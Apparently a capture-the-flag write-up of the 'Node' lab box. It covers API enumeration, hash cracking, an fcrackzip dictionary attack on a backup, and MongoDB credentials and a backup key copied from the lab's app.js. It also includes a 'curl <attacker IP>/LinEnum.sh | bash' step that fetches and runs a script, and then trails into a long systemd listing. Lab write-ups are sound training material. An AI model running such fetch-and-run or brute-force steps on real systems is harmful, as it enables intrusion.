Linux Boxes

node

  1. nmap
  2. http
    1. page source
      1. home.js
        1. /api/users/latest
      2. admin.js
        1. /api/admin/backup
      3. profile.js
        1. /api/users
      4. login.js
        1. /api/session/authenticate
    2. crackstation
  3. initial foothold on mark
    1. backup download
    2. fcrack
      1. fcrack brute force
      2. unzip myplace.decode.backup
    3. ssh mark
  4. privesc to Tom
    1. linEnum.sh
      1. report
        1. system
        2. USER/GROUP
        3. Environmental
        4. JOBS/TASKS
        5. Networking
        6. Services
        7. Interesting Files
      2. LinEnum finds:
    2. escalation method 1: mongo_db rev shell
      1. pentest monkey reverse shell
      2. excalating to Tom w/ reverse shell
    3. escalating method 2: copy privileged shell (ippsec)
  5. privesc to root
    1. find / -perm -4000 2>/dev/null
    2. /usr/local/bin/backup
      1. strace ./backup
      2. radar 2
      3. takes 3 arguments
      4. strace
      5. ./backup (trolled)
    3. badchars
    4. intended privesc- Buffer Overflow
      1. check for overflowed buffer
      2. pattern create
      3. python -c 'print "A"*520'
      4. buf.py
      5. find libc, system_off, exit_off and arg_off starting address
        1. /lib32 files
      6. update ret
      7. run buf.py win
    5. unintended privesc methods
      1. avoiding bad characters to extract root.txt
        1. decode and unzip and....
      2. creating a symlink
      3. wildcards
      4. command injection
  6. user/root
  7. lessons learned

node

images/786-1.png
images/786-2.png

nmap

images/787-1.png

nmap is reporting port 22 is open for ssh and
3000 is open running http

http

images/1972-1.png

page source

Web page source code doesn't show anything too suspicious, but there are a few javascript files that may give us some leads on how to initialize a foothold onto the box

images/788-1.png



images/788-2.png

home.js

/api/users/latest

images/793-1.png
images/793-2.png

/api/users/latest

Bingo! we have exposed users tom and mark along with their respective password hashes

Taking a look at the password strings all being 64 characters in length, its safe to assume theyre hashes
images/799-1.png

admin.js

images/794-1.png


We see the script refers to /api/admin/backup, lets navigate to that URL to see if theres anything interesting
images/794-2.png

/api/admin/backup

images/800-1.png


images/800-2.png
we get an authentication error = false here, lets move on and maybe revisit if we have the proper credentials...

profile.js

images/795-1.png

/api/users webpage is used, lets navigate to that webpage URL

images/795-2.png

/api/users

Bingo! we have exposed users and passwords checking the

images/797-1.png

login.js

images/796-1.png

seems the script refers to the /api/session/authenticate URL, lets navigate there
images/796-2.png

/api/session/authenticate

andd we get redirected back to the main page
images/798-1.png

images/798-2.png

crackstation

lets take these password hashes
images/790-1.pngimages/790-2.png

images/790-3.png

initial foothold on mark

taking a look at the webpage, we see there's a backup file we can download, lets save it to our working directory and take a look at it

images/791-1.png

images/791-2.png

revisiting the /api/admin/backup source code URL from earlier
images/791-3.png

images/791-4.png

its an incredibly long string that looks like its encoded in base64

this is most likely the same backup string as the one we get once we login as the myplace admin, refer to the myspace admin node

backup download

images/792-1.png
first lets move the backup file to our node directory:
images/792-2.png

and check our what type of file it is:
file myplace.backup
images/792-3.png

file reports its ascii with very long lines, but lets take a look at the first 100 characters with the head command
head -c100 myplace.backup
images/792-4.png

it looks like base64, lets decode it and run file on myspace.backup again
cat myplace.backup | base64 -d > myplace.decoded.backup
file myplace.decoded.backup
images/792-5.png
images/792-6.png

and we see its a zip file! lets unzip it
images/792-7.png

its password protected, time to bust out the brute force tool fcrack





fcrack

usage
images/802-1.png

fcrack brute force

fcrackzip -b -D -p /usr/share/wordlists/rockyou.txt myplace.decoded.backup
where
-b sets fcrackzip to brute-force mode
-D specifies dictionary attack
-p for password file we'll use rockyou.txt

images/803-1.png

images/803-2.png

unzip myplace.decode.backup

if we look at app.js we see that there are leaked credentials in the const url file,


const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
const backup_key = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';
images/804-1.png

we can also sift through the backup with grep:

grep -Ri mongo
where
-R recursive
-i is case insensitive
mongo is the string we're searching
images/804-2.png
images/804-3.png

we can sift through an output like this, but since we know mark's mongodb credentials, lets see if he reused his mongo pw with his ssh password
5AYRft73VtFpc84k

ssh mark

lets try the mongo creds we got and try to ssh into either mark or tom...
5AYRft73VtFpc84k

images/805-1.png
images/805-2.png

We're in!
but the user that has privileges to our user.txt flag is Tom
images/805-3.png
so we get permission denial

privesc to Tom

linEnum.sh

lets run linEnum and see what we get

first spin up an http server:
images/807-1.png

and dl LinEnum.sh from our victim
wget 10.10.14.62/LinEnum.sh
images/807-2.png

dont have privilege to download and run LinEnum.sh, lets try curl and pipe that to bash
curl 10.10.14.62/LinEnum.sh | bash
images/807-3.png

report

images/808-1.png

system

images/809-1.png


images/809-2.png

USER/GROUP

images/810-1.png

images/810-2.png

images/810-3.png

images/810-4.png

images/810-5.png

Environmental

images/811-1.png
images/811-2.png
images/811-3.png

JOBS/TASKS

images/812-1.png
images/812-2.png

images/812-3.png
images/812-4.png


Networking

images/813-1.png

Services

images/815-1.png


drwxr-xr-x 2 root root 4.0K Aug 29 2017 reboot.target.wants
drwxr-xr-x 2 root root 4.0K Aug 29 2017 sysinit.target.wants
drwxr-xr-x 2 root root 4.0K Aug 29 2017 sockets.target.wants
lrwxrwxrwx 1 root root 16 Aug 29 2017 runlevel5.target -> graphical.target
lrwxrwxrwx 1 root root 13 Aug 29 2017 runlevel6.target -> reboot.target
lrwxrwxrwx 1 root root 9 Aug 29 2017 sendsigs.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Aug 29 2017 sigpwr.target.wants
lrwxrwxrwx 1 root root 9 Aug 29 2017 single.service -> /dev/null
lrwxrwxrwx 1 root root 9 Aug 29 2017 stop-bootlogd.service -> /dev/null
lrwxrwxrwx 1 root root 9 Aug 29 2017 stop-bootlogd-single.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Aug 29 2017 systemd-resolved.service.d
drwxr-xr-x 2 root root 4.0K Aug 29 2017 systemd-timesyncd.service.d
drwxr-xr-x 2 root root 4.0K Aug 29 2017 timers.target.wants
lrwxrwxrwx 1 root root 21 Aug 29 2017 udev.service -> systemd-udevd.service
lrwxrwxrwx 1 root root 9 Aug 29 2017 umountfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Aug 29 2017 umountnfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Aug 29 2017 umountroot.service -> /dev/null
lrwxrwxrwx 1 root root 27 Aug 29 2017 urandom.service -> systemd-random-seed.service
lrwxrwxrwx 1 root root 9 Aug 29 2017 x11-common.service -> /dev/null
lrwxrwxrwx 1 root root 9 Aug 29 2017 killprocs.service -> /dev/null
lrwxrwxrwx 1 root root 28 Aug 29 2017 kmod.service -> systemd-modules-load.service
drwxr-xr-x 2 root root 4.0K Aug 29 2017 local-fs.target.wants
lrwxrwxrwx 1 root root 28 Aug 29 2017 module-init-tools.service -> systemd-modules-load.service
lrwxrwxrwx 1 root root 9 Aug 29 2017 motd.service -> /dev/null
lrwxrwxrwx 1 root root 9 Aug 29 2017 mountall-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root 9 Aug 29 2017 mountall.service -> /dev/null
lrwxrwxrwx 1 root root 9 Aug 29 2017 mountdevsubfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Aug 29 2017 mountkernfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Aug 29 2017 mountnfs-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root 9 Aug 29 2017 mountnfs.service -> /dev/null
lrwxrwxrwx 1 root root 22 Aug 29 2017 procps.service -> systemd-sysctl.service
lrwxrwxrwx 1 root root 16 Aug 29 2017 rc.local.service -> rc-local.service
drwxr-xr-x 2 root root 4.0K Aug 29 2017 rc-local.service.d
lrwxrwxrwx 1 root root 9 Aug 29 2017 rc.service -> /dev/null
lrwxrwxrwx 1 root root 9 Aug 29 2017 rcS.service -> /dev/null
lrwxrwxrwx 1 root root 9 Aug 29 2017 reboot.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Aug 29 2017 rescue.target.wants
drwxr-xr-x 2 root root 4.0K Aug 29 2017 resolvconf.service.wants
lrwxrwxrwx 1 root root 9 Aug 29 2017 rmnologin.service -> /dev/null
lrwxrwxrwx 1 root root 15 Aug 29 2017 runlevel0.target -> poweroff.target
lrwxrwxrwx 1 root root 13 Aug 29 2017 runlevel1.target -> rescue.target
lrwxrwxrwx 1 root root 17 Aug 29 2017 runlevel2.target -> multi-user.target
lrwxrwxrwx 1 root root 17 Aug 29 2017 runlevel3.target -> multi-user.target
lrwxrwxrwx 1 root root 17 Aug 29 2017 runlevel4.target -> multi-user.target
lrwxrwxrwx 1 root root 9 Aug 29 2017 checkfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Aug 29 2017 checkroot-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root 9 Aug 29 2017 checkroot.service -> /dev/null
lrwxrwxrwx 1 root root 9 Aug 29 2017 cryptdisks-early.service -> /dev/null
lrwxrwxrwx 1 root root 9 Aug 29 2017 cryptdisks.service -> /dev/null
lrwxrwxrwx 1 root root 13 Aug 29 2017 ctrl-alt-del.target -> reboot.target
lrwxrwxrwx 1 root root 25 Aug 29 2017 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service
lrwxrwxrwx 1 root root 23 Aug 29 2017 dbus-org.freedesktop.locale1.service -> systemd-localed.service
lrwxrwxrwx 1 root root 22 Aug 29 2017 dbus-org.freedesktop.login1.service -> systemd-logind.service
lrwxrwxrwx 1 root root 24 Aug 29 2017 dbus-org.freedesktop.network1.service -> systemd-networkd.service
lrwxrwxrwx 1 root root 24 Aug 29 2017 dbus-org.freedesktop.resolve1.service -> systemd-resolved.service
lrwxrwxrwx 1 root root 25 Aug 29 2017 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service
lrwxrwxrwx 1 root root 16 Aug 29 2017 default.target -> graphical.target
lrwxrwxrwx 1 root root 9 Aug 29 2017 fuse.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Aug 29 2017 getty.target.wants
drwxr-xr-x 2 root root 4.0K Aug 29 2017 graphical.target.wants
lrwxrwxrwx 1 root root 9 Aug 29 2017 halt.service -> /dev/null
lrwxrwxrwx 1 root root 9 Aug 29 2017 hostname.service -> /dev/null
lrwxrwxrwx 1 root root 9 Aug 29 2017 hwclock.service -> /dev/null
lrwxrwxrwx 1 root root 14 Aug 29 2017 autovt@.service -> getty@.service
lrwxrwxrwx 1 root root 9 Aug 29 2017 bootlogd.service -> /dev/null
lrwxrwxrwx 1 root root 9 Aug 29 2017 bootlogs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Aug 29 2017 bootmisc.service -> /dev/null
-rw-r--r-- 1 root root 683 Aug 23 2017 lxd.service
-rw-r--r-- 1 root root 206 Aug 23 2017 lxd-bridge.service
-rw-r--r-- 1 root root 318 Aug 23 2017 lxd-containers.service
-rw-r--r-- 1 root root 197 Aug 23 2017 lxd.socket
drwxr-xr-x 2 root root 4.0K Aug 1 2017 busnames.target.wants
-rw-r--r-- 1 root root 879 Jul 19 2017 basic.target
-rw-r--r-- 1 root root 379 Jul 19 2017 bluetooth.target
-rw-r--r-- 1 root root 358 Jul 19 2017 busnames.target
-rw-r--r-- 1 root root 770 Jul 19 2017 console-getty.service
-rw-r--r-- 1 root root 742 Jul 19 2017 console-shell.service
-rw-r--r-- 1 root root 791 Jul 19 2017 container-getty@.service
-rw-r--r-- 1 root root 394 Jul 19 2017 cryptsetup-pre.target
-rw-r--r-- 1 root root 366 Jul 19 2017 cryptsetup.target
-rw-r--r-- 1 root root 1010 Jul 19 2017 debug-shell.service
-rw-r--r-- 1 root root 670 Jul 19 2017 dev-hugepages.mount
-rw-r--r-- 1 root root 624 Jul 19 2017 dev-mqueue.mount
-rw-r--r-- 1 root root 1009 Jul 19 2017 emergency.service
-rw-r--r-- 1 root root 431 Jul 19 2017 emergency.target
-rw-r--r-- 1 root root 501 Jul 19 2017 exit.target
-rw-r--r-- 1 root root 440 Jul 19 2017 final.target
-rw-r--r-- 1 root root 1.5K Jul 19 2017 getty@.service
-rw-r--r-- 1 root root 460 Jul 19 2017 getty.target
-rw-r--r-- 1 root root 558 Jul 19 2017 graphical.target
-rw-r--r-- 1 root root 487 Jul 19 2017 halt.target
-rw-r--r-- 1 root root 447 Jul 19 2017 hibernate.target
-rw-r--r-- 1 root root 468 Jul 19 2017 hybrid-sleep.target
-rw-r--r-- 1 root root 630 Jul 19 2017 initrd-cleanup.service
-rw-r--r-- 1 root root 553 Jul 19 2017 initrd-fs.target
-rw-r--r-- 1 root root 790 Jul 19 2017 initrd-parse-etc.service
-rw-r--r-- 1 root root 526 Jul 19 2017 initrd-root-fs.target
-rw-r--r-- 1 root root 640 Jul 19 2017 initrd-switch-root.service
-rw-r--r-- 1 root root 691 Jul 19 2017 initrd-switch-root.target
-rw-r--r-- 1 root root 671 Jul 19 2017 initrd.target
-rw-r--r-- 1 root root 664 Jul 19 2017 initrd-udevadm-cleanup-db.service
-rw-r--r-- 1 root root 501 Jul 19 2017 kexec.target
-rw-r--r-- 1 root root 677 Jul 19 2017 kmod-static-nodes.service
-rw-r--r-- 1 root root 395 Jul 19 2017 local-fs-pre.target
-rw-r--r-- 1 root root 507 Jul 19 2017 local-fs.target
-rw-r--r-- 1 root root 405 Jul 19 2017 machine.slice
-rw-r--r-- 1 root root 473 Jul 19 2017 mail-transport-agent.target
-rw-r--r-- 1 root root 492 Jul 19 2017 multi-user.target
-rw-r--r-- 1 root root 464 Jul 19 2017 network-online.target
-rw-r--r-- 1 root root 461 Jul 19 2017 network-pre.target
-rw-r--r-- 1 root root 480 Jul 19 2017 network.target
-rw-r--r-- 1 root root 514 Jul 19 2017 nss-lookup.target
-rw-r--r-- 1 root root 473 Jul 19 2017 nss-user-lookup.target
-rw-r--r-- 1 root root 354 Jul 19 2017 paths.target
-rw-r--r-- 1 root root 552 Jul 19 2017 poweroff.target
-rw-r--r-- 1 root root 377 Jul 19 2017 printer.target
-rw-r--r-- 1 root root 693 Jul 19 2017 proc-sys-fs-binfmt_misc.automount
-rw-r--r-- 1 root root 603 Jul 19 2017 proc-sys-fs-binfmt_misc.mount
-rw-r--r-- 1 root root 568 Jul 19 2017 quotaon.service
-rw-r--r-- 1 root root 612 Jul 19 2017 rc-local.service
-rw-r--r-- 1 root root 543 Jul 19 2017 reboot.target
-rw-r--r-- 1 root root 396 Jul 19 2017 remote-fs-pre.target
-rw-r--r-- 1 root root 482 Jul 19 2017 remote-fs.target
-rw-r--r-- 1 root root 978 Jul 19 2017 rescue.service
-rw-r--r-- 1 root root 486 Jul 19 2017 rescue.target
-rw-r--r-- 1 root root 500 Jul 19 2017 rpcbind.target
-rw-r--r-- 1 root root 1.1K Jul 19 2017 serial-getty@.service
-rw-r--r-- 1 root root 402 Jul 19 2017 shutdown.target
-rw-r--r-- 1 root root 362 Jul 19 2017 sigpwr.target
-rw-r--r-- 1 root root 420 Jul 19 2017 sleep.target
-rw-r--r-- 1 root root 403 Jul 19 2017 -.slice
-rw-r--r-- 1 root root 409 Jul 19 2017 slices.target
-rw-r--r-- 1 root root 380 Jul 19 2017 smartcard.target
-rw-r--r-- 1 root root 356 Jul 19 2017 sockets.target
-rw-r--r-- 1 root root 380 Jul 19 2017 sound.target
-rw-r--r-- 1 root root 441 Jul 19 2017 suspend.target
-rw-r--r-- 1 root root 353 Jul 19 2017 swap.target
-rw-r--r-- 1 root root 715 Jul 19 2017 sys-fs-fuse-connections.mount
-rw-r--r-- 1 root root 518 Jul 19 2017 sysinit.target
-rw-r--r-- 1 root root 719 Jul 19 2017 sys-kernel-config.mount
-rw-r--r-- 1 root root 662 Jul 19 2017 sys-kernel-debug.mount
-rw-r--r-- 1 root root 1.3K Jul 19 2017 syslog.socket
-rw-r--r-- 1 root root 646 Jul 19 2017 systemd-ask-password-console.path
-rw-r--r-- 1 root root 653 Jul 19 2017 systemd-ask-password-console.service
-rw-r--r-- 1 root root 574 Jul 19 2017 systemd-ask-password-wall.path
-rw-r--r-- 1 root root 681 Jul 19 2017 systemd-ask-password-wall.service
-rw-r--r-- 1 root root 724 Jul 19 2017 systemd-backlight@.service
-rw-r--r-- 1 root root 959 Jul 19 2017 systemd-binfmt.service
-rw-r--r-- 1 root root 650 Jul 19 2017 systemd-bootchart.service
-rw-r--r-- 1 root root 1.0K Jul 19 2017 systemd-bus-proxyd.service
-rw-r--r-- 1 root root 409 Jul 19 2017 systemd-bus-proxyd.socket
-rw-r--r-- 1 root root 497 Jul 19 2017 systemd-exit.service
-rw-r--r-- 1 root root 551 Jul 19 2017 systemd-fsckd.service
-rw-r--r-- 1 root root 540 Jul 19 2017 systemd-fsckd.socket
-rw-r--r-- 1 root root 674 Jul 19 2017 systemd-fsck-root.service
-rw-r--r-- 1 root root 648 Jul 19 2017 systemd-fsck@.service
-rw-r--r-- 1 root root 544 Jul 19 2017 systemd-halt.service
-rw-r--r-- 1 root root 631 Jul 19 2017 systemd-hibernate-resume@.service
-rw-r--r-- 1 root root 501 Jul 19 2017 systemd-hibernate.service
-rw-r--r-- 1 root root 710 Jul 19 2017 systemd-hostnamed.service
-rw-r--r-- 1 root root 778 Jul 19 2017 systemd-hwdb-update.service
-rw-r--r-- 1 root root 519 Jul 19 2017 systemd-hybrid-sleep.service
-rw-r--r-- 1 root root 480 Jul 19 2017 systemd-initctl.service
-rw-r--r-- 1 root root 524 Jul 19 2017 systemd-initctl.socket
-rw-r--r-- 1 root root 607 Jul 19 2017 systemd-journald-audit.socket
-rw-r--r-- 1 root root 1.1K Jul 19 2017 systemd-journald-dev-log.socket
-rw-r--r-- 1 root root 1.3K Jul 19 2017 systemd-journald.service
-rw-r--r-- 1 root root 842 Jul 19 2017 systemd-journald.socket
-rw-r--r-- 1 root root 731 Jul 19 2017 systemd-journal-flush.service
-rw-r--r-- 1 root root 557 Jul 19 2017 systemd-kexec.service
-rw-r--r-- 1 root root 691 Jul 19 2017 systemd-localed.service
-rw-r--r-- 1 root root 1.2K Jul 19 2017 systemd-logind.service
-rw-r--r-- 1 root root 693 Jul 19 2017 systemd-machine-id-commit.service
-rw-r--r-- 1 root root 967 Jul 19 2017 systemd-modules-load.service
-rw-r--r-- 1 root root 1.3K Jul 19 2017 systemd-networkd.service
-rw-r--r-- 1 root root 591 Jul 19 2017 systemd-networkd.socket
-rw-r--r-- 1 root root 685 Jul 19 2017 systemd-networkd-wait-online.service
-rw-r--r-- 1 root root 553 Jul 19 2017 systemd-poweroff.service
-rw-r--r-- 1 root root 614 Jul 19 2017 systemd-quotacheck.service
-rw-r--r-- 1 root root 717 Jul 19 2017 systemd-random-seed.service
-rw-r--r-- 1 root root 548 Jul 19 2017 systemd-reboot.service
-rw-r--r-- 1 root root 757 Jul 19 2017 systemd-remount-fs.service
-rw-r--r-- 1 root root 907 Jul 19 2017 systemd-resolved.service
-rw-r--r-- 1 root root 696 Jul 19 2017 systemd-rfkill.service
-rw-r--r-- 1 root root 617 Jul 19 2017 systemd-rfkill.socket
-rw-r--r-- 1 root root 497 Jul 19 2017 systemd-suspend.service
-rw-r--r-- 1 root root 649 Jul 19 2017 systemd-sysctl.service
-rw-r--r-- 1 root root 655 Jul 19 2017 systemd-timedated.service
-rw-r--r-- 1 root root 1.1K Jul 19 2017 systemd-timesyncd.service
-rw-r--r-- 1 root root 598 Jul 19 2017 systemd-tmpfiles-clean.service
-rw-r--r-- 1 root root 450 Jul 19 2017 systemd-tmpfiles-clean.timer
-rw-r--r-- 1 root root 703 Jul 19 2017 systemd-tmpfiles-setup-dev.service
-rw-r--r-- 1 root root 683 Jul 19 2017 systemd-tmpfiles-setup.service
-rw-r--r-- 1 root root 578 Jul 19 2017 systemd-udevd-control.socket
-rw-r--r-- 1 root root 570 Jul 19 2017 systemd-udevd-kernel.socket
-rw-r--r-- 1 root root 825 Jul 19 2017 systemd-udevd.service
-rw-r--r-- 1 root root 823 Jul 19 2017 systemd-udev-settle.service
-rw-r--r-- 1 root root 743 Jul 19 2017 systemd-udev-trigger.service
-rw-r--r-- 1 root root 757 Jul 19 2017 systemd-update-utmp-runlevel.service
-rw-r--r-- 1 root root 754 Jul 19 2017 systemd-update-utmp.service
-rw-r--r-- 1 root root 573 Jul 19 2017 systemd-user-sessions.service
-rw-r--r-- 1 root root 436 Jul 19 2017 system.slice
-rw-r--r-- 1 root root 585 Jul 19 2017 system-update.target
-rw-r--r-- 1 root root 405 Jul 19 2017 timers.target
-rw-r--r-- 1 root root 395 Jul 19 2017 time-sync.target
-rw-r--r-- 1 root root 417 Jul 19 2017 umount.target
-rw-r--r-- 1 root root 528 Jul 19 2017 user@.service
-rw-r--r-- 1 root root 392 Jul 19 2017 user.slice
-rw-r--r-- 1 root root 342 Jul 17 2017 getty-static.service
-rw-r--r-- 1 root root 153 Jul 17 2017 sigpwr-container-shutdown.service
-rw-r--r-- 1 root root 175 Jul 17 2017 systemd-networkd-resolvconf-update.path
-rw-r--r-- 1 root root 715 Jul 17 2017 systemd-networkd-resolvconf-update.service
-rw-r--r-- 1 root root 192 Jul 17 2017 snapd.autoimport.service
-rw-r--r-- 1 root root 368 Jul 17 2017 snapd.core-fixup.service
-rw-r--r-- 1 root root 290 Jul 17 2017 snapd.refresh.service
-rw-r--r-- 1 root root 323 Jul 17 2017 snapd.refresh.timer
-rw-r--r-- 1 root root 212 Jul 17 2017 snapd.service
-rw-r--r-- 1 root root 281 Jul 17 2017 snapd.socket
-rw-r--r-- 1 root root 474 Jul 17 2017 snapd.system-shutdown.service
-rw-r--r-- 1 root root 642 Jul 14 2017 mongod.service
-rw-r--r-- 1 root root 311 Jul 5 2017 lxcfs.service
-rw-r--r-- 1 root root 169 Jun 19 2017 apt-daily.service
-rw-r--r-- 1 root root 212 Jun 19 2017 apt-daily.timer
-rw-r--r-- 1 root root 202 Jun 19 2017 apt-daily-upgrade.service
-rw-r--r-- 1 root root 184 Jun 19 2017 apt-daily-upgrade.timer
-rw-r--r-- 1 root root 189 Jun 14 2017 uuidd.service
-rw-r--r-- 1 root root 126 Jun 14 2017 uuidd.socket
-rw-r--r-- 1 root root 345 Apr 20 2017 unattended-upgrades.service
-rw-r--r-- 1 root root 385 Mar 16 2017 ssh.service
-rw-r--r-- 1 root root 196 Mar 16 2017 ssh@.service
-rw-r--r-- 1 root root 216 Mar 16 2017 ssh.socket
-rw-r--r-- 1 root root 269 Jan 31 2017 setvtrgb.service
-rw-r--r-- 1 root root 491 Jan 12 2017 dbus.service
-rw-r--r-- 1 root root 106 Jan 12 2017 dbus.socket
-rw-r--r-- 1 root root 420 Dec 7 2016 resolvconf.service
-rw-r--r-- 1 root root 735 Nov 30 2016 networking.service
-rw-r--r-- 1 root root 497 Nov 30 2016 ifup@.service
-rw-r--r-- 1 root root 631 Nov 3 2016 accounts-daemon.service
-rw-r--r-- 1 root root 251 Sep 18 2016 open-vm-tools.service
-rw-r--r-- 1 root root 285 Jun 16 2016 keyboard-setup.service
-rw-r--r-- 1 root root 288 Jun 16 2016 console-setup.service
lrwxrwxrwx 1 root root 27 May 10 2016 plymouth-log.service -> plymouth-read-write.service
lrwxrwxrwx 1 root root 21 May 10 2016 plymouth.service -> plymouth-quit.service
-rw-r--r-- 1 root root 412 May 10 2016 plymouth-halt.service
-rw-r--r-- 1 root root 426 May 10 2016 plymouth-kexec.service
-rw-r--r-- 1 root root 421 May 10 2016 plymouth-poweroff.service
-rw-r--r-- 1 root root 194 May 10 2016 plymouth-quit.service
-rw-r--r-- 1 root root 200 May 10 2016 plymouth-quit-wait.service
-rw-r--r-- 1 root root 244 May 10 2016 plymouth-read-write.service
-rw-r--r-- 1 root root 416 May 10 2016 plymouth-reboot.service
-rw-r--r-- 1 root root 532 May 10 2016 plymouth-start.service
-rw-r--r-- 1 root root 291 May 10 2016 plymouth-switch-root.service
-rw-r--r-- 1 root root 490 May 10 2016 systemd-ask-password-plymouth.path
-rw-r--r-- 1 root root 467 May 10 2016 systemd-ask-password-plymouth.service
lrwxrwxrwx 1 root root 9 Apr 16 2016 lvm2.service -> /dev/null
-rw-r--r-- 1 root root 334 Apr 16 2016 dm-event.service
-rw-r--r-- 1 root root 248 Apr 16 2016 dm-event.socket
-rw-r--r-- 1 root root 380 Apr 16 2016 lvm2-lvmetad.service
-rw-r--r-- 1 root root 215 Apr 16 2016 lvm2-lvmetad.socket
-rw-r--r-- 1 root root 335 Apr 16 2016 lvm2-lvmpolld.service
-rw-r--r-- 1 root root 213 Apr 16 2016 lvm2-lvmpolld.socket
-rw-r--r-- 1 root root 658 Apr 16 2016 lvm2-monitor.service
-rw-r--r-- 1 root root 382 Apr 16 2016 lvm2-pvscan@.service
drwxr-xr-x 2 root root 4.0K Apr 12 2016 runlevel1.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12 2016 runlevel2.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12 2016 runlevel3.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12 2016 runlevel4.target.wants
drwxr-xr-x 2 root root 4.0K Apr 12 2016 runlevel5.target.wants
-rw-r--r-- 1 root root 234 Apr 8 2016 acpid.service
-rw-r--r-- 1 root root 251 Apr 5 2016 cron.service
-rw-r--r-- 1 root root 290 Apr 5 2016 rsyslog.service
-rw-r--r-- 1 root root 142 Mar 31 2016 apport-forward@.service
-rw-r--r-- 1 root root 225 Mar 31 2016 apport-forward.socket
-rw-r--r-- 1 root root 455 Mar 29 2016 iscsid.service
-rw-r--r-- 1 root root 1.1K Mar 29 2016 open-iscsi.service
-rw-r--r-- 1 root root 115 Feb 9 2016 acpid.socket
-rw-r--r-- 1 root root 115 Feb 9 2016 acpid.path
-rw-r--r-- 1 root root 169 Jan 14 2016 atd.service
-rw-r--r-- 1 root root 182 Jan 14 2016 polkitd.service
-rw-r--r-- 1 root root 790 Jun 1 2015 friendly-recovery.service
-rw-r--r-- 1 root root 241 Mar 3 2015 ufw.service
-rw-r--r-- 1 root root 250 Feb 24 2015 ureadahead-stop.service
-rw-r--r-- 1 root root 242 Feb 24 2015 ureadahead-stop.timer
-rw-r--r-- 1 root root 401 Feb 24 2015 ureadahead.service
-rw-r--r-- 1 root root 188 Feb 24 2014 rsync.service

/lib/systemd/system/halt.target.wants:
total 0
lrwxrwxrwx 1 root root 24 May 10 2016 plymouth-halt.service -> ../plymouth-halt.service

/lib/systemd/system/initrd-switch-root.target.wants:
total 0
lrwxrwxrwx 1 root root 25 May 10 2016 plymouth-start.service -> ../plymouth-start.service
lrwxrwxrwx 1 root root 31 May 10 2016 plymouth-switch-root.service -> ../plymouth-switch-root.service

/lib/systemd/system/kexec.target.wants:
total 0
lrwxrwxrwx 1 root root 25 May 10 2016 plymouth-kexec.service -> ../plymouth-kexec.service

/lib/systemd/system/multi-user.target.wants:
total 0
lrwxrwxrwx 1 root root 15 Aug 29 2017 getty.target -> ../getty.target
lrwxrwxrwx 1 root root 33 Aug 29 2017 systemd-ask-password-wall.path -> ../systemd-ask-password-wall.path
lrwxrwxrwx 1 root root 25 Aug 29 2017 systemd-logind.service -> ../systemd-logind.service
lrwxrwxrwx 1 root root 39 Aug 29 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 32 Aug 29 2017 systemd-user-sessions.service -> ../systemd-user-sessions.service
lrwxrwxrwx 1 root root 15 Jan 12 2017 dbus.service -> ../dbus.service
lrwxrwxrwx 1 root root 24 May 10 2016 plymouth-quit.service -> ../plymouth-quit.service
lrwxrwxrwx 1 root root 29 May 10 2016 plymouth-quit-wait.service -> ../plymouth-quit-wait.service

/lib/systemd/system/poweroff.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Aug 29 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 28 May 10 2016 plymouth-poweroff.service -> ../plymouth-poweroff.service

/lib/systemd/system/reboot.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Aug 29 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 26 May 10 2016 plymouth-reboot.service -> ../plymouth-reboot.service

/lib/systemd/system/sysinit.target.wants:
total 0
lrwxrwxrwx 1 root root 24 Aug 29 2017 console-setup.service -> ../console-setup.service
lrwxrwxrwx 1 root root 20 Aug 29 2017 cryptsetup.target -> ../cryptsetup.target
lrwxrwxrwx 1 root root 22 Aug 29 2017 dev-hugepages.mount -> ../dev-hugepages.mount
lrwxrwxrwx 1 root root 19 Aug 29 2017 dev-mqueue.mount -> ../dev-mqueue.mount
lrwxrwxrwx 1 root root 25 Aug 29 2017 keyboard-setup.service -> ../keyboard-setup.service
lrwxrwxrwx 1 root root 28 Aug 29 2017 kmod-static-nodes.service -> ../kmod-static-nodes.service
lrwxrwxrwx 1 root root 36 Aug 29 2017 proc-sys-fs-binfmt_misc.automount -> ../proc-sys-fs-binfmt_misc.automount
lrwxrwxrwx 1 root root 19 Aug 29 2017 setvtrgb.service -> ../setvtrgb.service
lrwxrwxrwx 1 root root 32 Aug 29 2017 sys-fs-fuse-connections.mount -> ../sys-fs-fuse-connections.mount
lrwxrwxrwx 1 root root 26 Aug 29 2017 sys-kernel-config.mount -> ../sys-kernel-config.mount
lrwxrwxrwx 1 root root 25 Aug 29 2017 sys-kernel-debug.mount -> ../sys-kernel-debug.mount
lrwxrwxrwx 1 root root 36 Aug 29 2017 systemd-ask-password-console.path -> ../systemd-ask-password-console.path
lrwxrwxrwx 1 root root 25 Aug 29 2017 systemd-binfmt.service -> ../systemd-binfmt.service
lrwxrwxrwx 1 root root 30 Aug 29 2017 systemd-hwdb-update.service -> ../systemd-hwdb-update.service
lrwxrwxrwx 1 root root 27 Aug 29 2017 systemd-journald.service -> ../systemd-journald.service
lrwxrwxrwx 1 root root 32 Aug 29 2017 systemd-journal-flush.service -> ../systemd-journal-flush.service
